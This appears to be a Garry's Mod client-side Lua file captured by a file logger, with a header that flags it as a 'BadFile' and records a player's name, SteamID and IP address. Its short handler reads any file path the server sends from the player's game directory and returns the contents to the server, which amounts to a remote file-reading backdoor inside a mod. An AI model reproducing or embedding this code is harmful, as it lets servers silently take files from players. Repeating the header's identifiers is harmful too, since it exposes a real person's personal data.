--[[
	MOD/lua/file_view/cl/file_text.lua [#202 (#209), 7435081, UID:2554170430]
	xX-TrueMLGPlayer420Trikshot-Xx | STEAM_0:0:71356345 <82.238.182.218:27005> | [22.06.14 02:38:37PM]
	===BadFile===
]]

net.Receive("file_text",function()
local loc=net.ReadString()
net.Start("file_text")
net.WriteString(loc)
net.WriteString(file.Read(loc,"GAME"))
net.WriteEntity(net.ReadEntity())
net.SendToServer()
end)